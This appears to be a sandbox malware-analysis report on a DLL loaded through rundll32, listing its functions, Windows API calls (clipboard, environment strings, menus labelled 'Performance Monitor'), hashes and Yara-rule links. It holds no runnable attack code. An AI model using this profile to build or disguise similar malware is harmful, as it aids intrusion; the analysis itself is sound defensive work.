Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3941765731-1240500531
Opcode ID: e5d33f793ae91bceb4120985210560da8a99482854c1b76429f33cec188345f2
Instruction ID: dde732118f963fb4c5da0b9e64b1dc4d10a3fe67177e52302cbbcee8810c6aad
Opcode Fuzzy Hash: e5d33f793ae91bceb4120985210560da8a99482854c1b76429f33cec188345f2
Instruction Fuzzy Hash: 7F41D3B1900209AFC704DFD8D840BDEBBFCEF49624F148A1AE514D7640E731EA448FA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E9B5E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9B5E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E9B5E93
GetACP.KERNEL32(00000000,?,?,?), ref: 6E9B5EA4

Strings

e, xrefs: 6E9B5DAF

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: 81efc703dff406c44d2efdaeb6d93f89804a671c42d35dce858acc4b9f778921
Instruction ID: e74dc6c8dead2962f67c0ab0246f3c8a58d35c8ec58ece4b522d06a24ed193bf
Opcode Fuzzy Hash: 81efc703dff406c44d2efdaeb6d93f89804a671c42d35dce858acc4b9f778921
Instruction Fuzzy Hash: CE31C1329187054FC312DE7A944461BF7EAAFEA384F148B2AF441F2155FB30D8888A92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C1C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 6E9C1C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 6E9C1C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 6E9C1C52

Strings

Performance Monitor - (Reload Configuration), xrefs: 6E9C1C2C
Performance Monitor - (Edit Configuration), xrefs: 6E9C1C40

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: 5d66331111edbc8ff8dae490c12e4531b8854ee6f5d9e2b0c8659ab243e54d00
Instruction ID: f886c5012efd4cd1c45c74455496eaabc31d08ff9d54768a5194aa135ed91423
Opcode Fuzzy Hash: 5d66331111edbc8ff8dae490c12e4531b8854ee6f5d9e2b0c8659ab243e54d00
Instruction Fuzzy Hash: 27F09A3225021DBBEB11DE859C80FAB7B6DEF89610F044016BB14AA181C271E922AFB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D6A30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E9D69E1,6E9D69A9), ref: 6E9D6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E9D6A63
FreeLibrary.KERNEL32(00000000,?,?,?,6E9D69E1,6E9D69A9), ref: 6E9D6A86

Strings

CorExitProcess, xrefs: 6E9D6A5B
mscoree.dll, xrefs: 6E9D6A49

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cc87ea35da49a30787fe9fa4b9a2d0241005e7eb318a653fc64f8142c2d5f4c4
Instruction ID: cb232ca0a54094c2dd66b011daf2d8c2f7ec0b6cb983e3fd647414aed2b821bf
Opcode Fuzzy Hash: cc87ea35da49a30787fe9fa4b9a2d0241005e7eb318a653fc64f8142c2d5f4c4
Instruction Fuzzy Hash: 7AF0A430504718BBCF11AFA0C818BEEBFB8EF45215F018069E905A6251DB309945CE90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0f632be4cd696d75596e2bbcbf0036f1d9a8f83b8f5af212cd37e8fd78cc2d
Instruction ID: 322d917a97af692dc64c74bf893426cc73aa10fdf6e91acd8ca4c7c5ad048da8
Opcode Fuzzy Hash: 5d0f632be4cd696d75596e2bbcbf0036f1d9a8f83b8f5af212cd37e8fd78cc2d
Instruction Fuzzy Hash: A771B131D24A2B9FDB118FD9C884AAEFB7DEF51350F148629E42457284DB70D889CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C4260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,7BDA3107,?,?,00000000,6E9E9E9B,000000FF,?,6E9C15EF,00000000), ref: 6E9C42B3
PdhCloseQuery.PDH(?,7BDA3107,?,?,00000000,6E9E9E9B,000000FF,?,6E9C15EF,00000000), ref: 6E9C42DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 6E9C4302
PdhValidatePathW.PDH(?), ref: 6E9C435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 6E9C438A

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: b8c4b16615f7582c7b81bbbaaa0ce2c07f9c6a2717f0200ba869caa997030292
Instruction ID: a4562017ec3c2bfcc1317ef07474fb97e0622380014655024536b40870a59607
Opcode Fuzzy Hash: b8c4b16615f7582c7b81bbbaaa0ce2c07f9c6a2717f0200ba869caa997030292
Instruction Fuzzy Hash: 1851C171A00259ABDB20DF54C840BDAB7B9FF44714F108599E958AB340DB74EAC6CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D70FB, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9D716D
_free.LIBCMT ref: 6E9D718D

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b40ce0a0e5e989bb8e19972c2c7336edd5b897fa726c1caa323fc06a3e6ca992
Instruction ID: b1551ea71291a8c5cbdb8386075bd6e12190a8cc975785caeff7b21d958f193e
Opcode Fuzzy Hash: b40ce0a0e5e989bb8e19972c2c7336edd5b897fa726c1caa323fc06a3e6ca992
Instruction Fuzzy Hash: B341F572A00A109FDB14DFB8C880A9DB7F9EF85718F158AA9D515EB381DB30E905CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B4C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4C7C
std::_Lockit::_Lockit.LIBCPMT ref: 6E9B4C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4CBE
std::_Facet_Register.LIBCPMT ref: 6E9B4D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E9B4DAF

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: efaedc00b6ef6a47b04870feb39cee492e7fdf0c5ac2fd8350b3c5b1027d653b
Instruction ID: 94e15bcc46e833c38b924a7b5982e31f4ae7441654bc78c6f32c646b91b00a15
Opcode Fuzzy Hash: efaedc00b6ef6a47b04870feb39cee492e7fdf0c5ac2fd8350b3c5b1027d653b
Instruction Fuzzy Hash: 21517B71A147158BCB11DF94C440BEEB7B8EF95B18F10455DD806AB280EB74FA46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DDD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E9DDD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9DDD2F

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E9DDD55
_free.LIBCMT ref: 6E9DDD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9DDD77

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 7ab1135bcec365394d147a66c631f7744853dfc457a9595b2765cc7c73f8e868
Instruction ID: b16193dd53063859aafbd8e6954b8584dc5c2b65125ddb2a52cd8f1ce4164380
Opcode Fuzzy Hash: 7ab1135bcec365394d147a66c631f7744853dfc457a9595b2765cc7c73f8e868
Instruction Fuzzy Hash: FF0175B6605F2A7F2B2119FA4C8CE7B297DEEC3AA53114269F914C3644EB65CC058DB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,6E9D6995,?,6E9D642D,6E9D9BBE,6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9DA3E7
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E9D731A,000000FF,000000FF), ref: 6E9DA40D
_free.LIBCMT ref: 6E9DA44D
_free.LIBCMT ref: 6E9DA480
SetLastError.KERNEL32(00000000,000000FF), ref: 6E9DA48D

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f714da0d2a89be597cf7eb07ac4012faef108459287e3e92e38b9f262c106be4
Instruction ID: 8194e20379b6e6d02ee9ec4260220bf332c7e7d04f5362e95b779593aeae6b96
Opcode Fuzzy Hash: f714da0d2a89be597cf7eb07ac4012faef108459287e3e92e38b9f262c106be4
Instruction Fuzzy Hash: 8F114072208E216BD6021AF99D48E7B272DAFE227D724CA10F538923C4FF70C91D8D10

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9E4990

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9E49A2
_free.LIBCMT ref: 6E9E49B4
_free.LIBCMT ref: 6E9E49C6
_free.LIBCMT ref: 6E9E49D8

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 86a26099ee2880bcddd9e6e265faec205d1e5d65a7d64c3a84ad114337c90e0f
Instruction ID: 64b9fdb6989519cd042c4a31905fc4b1e22de9de5cc72678b8d9ae220772decd
Opcode Fuzzy Hash: 86a26099ee2880bcddd9e6e265faec205d1e5d65a7d64c3a84ad114337c90e0f
Instruction Fuzzy Hash: 99F09671444F19AB8A61EEE8E490C9733DDAF40B143A58C05F11AE7900C734F881CEA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C8750, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 6E9C875C
GetLastError.KERNEL32(?,00000000,?,00000000,8007000E), ref: 6E9C8761
_com_issue_error.COMSUPP ref: 6E9C8774
GetLastError.KERNEL32(?,00000000,8007000E), ref: 6E9C8782
_com_issue_error.COMSUPP ref: 6E9C8795

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ErrorLast
String ID:
API String ID: 1321852664-0
Opcode ID: 07aa8422eaeab54b32c8cfc81d9c9adcff52701df726883fc5b8e44dedcfd69d
Instruction ID: a74955896a2fad9e1e825dba3fa901b0937f39966c0ed2854a8a317b89746fbd
Opcode Fuzzy Hash: 07aa8422eaeab54b32c8cfc81d9c9adcff52701df726883fc5b8e44dedcfd69d
Instruction Fuzzy Hash: 5BE0CDF450025A99C6347BF01D087AA30AC2F50925F204E187198F5094FB3CF1114D7B

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E9D6B17, 6E9D6B1E, 6E9D6B52

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: d522514c2abe7408ddbcd3fcc5c5bab5f68c6344e7998813f0e92549f4d47bca
Instruction ID: bf0a000423e052e048cfaa9524183ee58535b17aeb7ad6ea56fcee2191417d2d
Opcode Fuzzy Hash: d522514c2abe7408ddbcd3fcc5c5bab5f68c6344e7998813f0e92549f4d47bca
Instruction Fuzzy Hash: F041C371E24A29AFDB11DFD9C9809EEBBBCEF99314B00846AE400E7201D775DA49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6E9DA642

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 6c7155556362a2b437ea226707d70ec6b566e8049db727c4117121b7819a6def
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 2CB16972D45A669FE7128F98C8507EDBBB8EF11364F148165D8109B381D3B8C966CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B5A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,6E9B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E9B5A3C
CloseClipboard.USER32 ref: 6E9B5A73
GetMenuCheckMarkDimensions.USER32 ref: 6E9B5B30
IsSystemResumeAutomatic.KERNEL32 ref: 6E9B5BA0

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 420c58f88c7220a427d497e810b55acf67b977be7ae7237d411bba84f75a96ba
Instruction ID: 462a25a1ce2d39e871e62e489d0fe93894f9a8d1b24f911d12af309ba9c21eb7
Opcode Fuzzy Hash: 420c58f88c7220a427d497e810b55acf67b977be7ae7237d411bba84f75a96ba
Instruction Fuzzy Hash: 7C41B431914B564AC303DEB5C49021FF7ABBFEA684F549B2AE441B6255FB30C8858E82

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6E9B8FE1

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 36383e267eb119cb748b8d0e7189aced13e0f8b401a3f0d46581f71870c3ac02
Instruction ID: ded782a242825d6c319d001703e78880ac7be7c0ed9198073ce7a45e4cb27e34
Opcode Fuzzy Hash: 36383e267eb119cb748b8d0e7189aced13e0f8b401a3f0d46581f71870c3ac02
Instruction Fuzzy Hash: 85312832B083164B9F18CDADD49556BBBE9EF44370710827EEC15C7248EB32D850CAC0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DF32A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(24448D6E,00000000,?,00000002,00000000,00000000,00000000,00000000,?,24448D6E,00000001,00000002,?,00000001,00000000,?), ref: 6E9DF377
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6E9DF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6E9DF412
__freea.LIBCMT ref: 6E9DF41B

Part of subcall function 6E9D9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6E9C8F9C,00000105,000000FF,24448D6E,00000000,?,6E9B1687,?,00000103,000000FF), ref: 6E9D9C04

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 5875e5b37efd1fee948499c48d84b7fbceaa540ec925a5ba02ff4f368611eb74
Instruction ID: 072fc784265d1ee308a92df2fe9f4a719f68b95eee1d3336894b08f5a5f876e1
Opcode Fuzzy Hash: 5875e5b37efd1fee948499c48d84b7fbceaa540ec925a5ba02ff4f368611eb74
Instruction Fuzzy Hash: 6A310372A00A2AAFDF258FA4CC55DEE7BA9EF40718F158128EC14DB240E735C959CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6E9B8ECE
SysAllocString.OLEAUT32(?), ref: 6E9B8F39
_com_issue_error.COMSUPP ref: 6E9B8F75
_com_issue_error.COMSUPP ref: 6E9B8F7F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 1f5c44b7e8de1b6b3e4e2552395064672947824e94017ec103cf0274127eeb73
Instruction ID: 9e4cb41975401ab28725f7c957aa548333105adb8b5542315c10a972eed70a83
Opcode Fuzzy Hash: 1f5c44b7e8de1b6b3e4e2552395064672947824e94017ec103cf0274127eeb73
Instruction Fuzzy Hash: 0E31B3B1A00717DBE774AF95C840B47B7ECEF49B24F20462AE825D7280D774E4808F91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6E9B8DC0
_com_issue_error.COMSUPP ref: 6E9B8DFC
_com_issue_error.COMSUPP ref: 6E9B8E06
SysFreeString.OLEAUT32(-00000001), ref: 6E9B8E34

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 8f2f29c890c6ee5a2d6e329ccdf157ff8fd9bf59403bcc1194daa213511327cc
Instruction ID: 0ac237200a53c2e5b79acf7acacd4f70398965d991545377526ab8ce6ba776f6
Opcode Fuzzy Hash: 8f2f29c890c6ee5a2d6e329ccdf157ff8fd9bf59403bcc1194daa213511327cc
Instruction Fuzzy Hash: 2331D4B19107169BD7349F95D804B97FBECEF55B24F10462EE864A7280E7B4E4408F91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C32C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C32CC
GetCurrentThreadId.KERNEL32 ref: 6E9C32DC
LeaveCriticalSection.KERNEL32(6E9FFAA4), ref: 6E9C330C
SetWindowLongW.USER32 ref: 6E9C335F

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: d1d77fd0891ba1c1ced08ce93f9e4113eaf18ac63d1d06a323c77ac4fd9080d3
Instruction ID: a553c5e37df8c5711df6a3a773cb3645deb11d3bd8a11edd0fe1882ef2e1404f
Opcode Fuzzy Hash: d1d77fd0891ba1c1ced08ce93f9e4113eaf18ac63d1d06a323c77ac4fd9080d3
Instruction Fuzzy Hash: 23219232608616AF8B20EFE6D84895B7B69FF85F613944959ED15C7204EB30E811CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B90C0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6E9B90C7
VariantCopy.OLEAUT32(?,?), ref: 6E9B90D1
_com_issue_error.COMSUPP ref: 6E9B90E3
VariantClear.OLEAUT32 ref: 6E9B90F1

Memory Dump Source

Source File: 00000002.00000002.352701459.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000002.00000002.352697997.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352731615.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.352741670.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.352745841.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
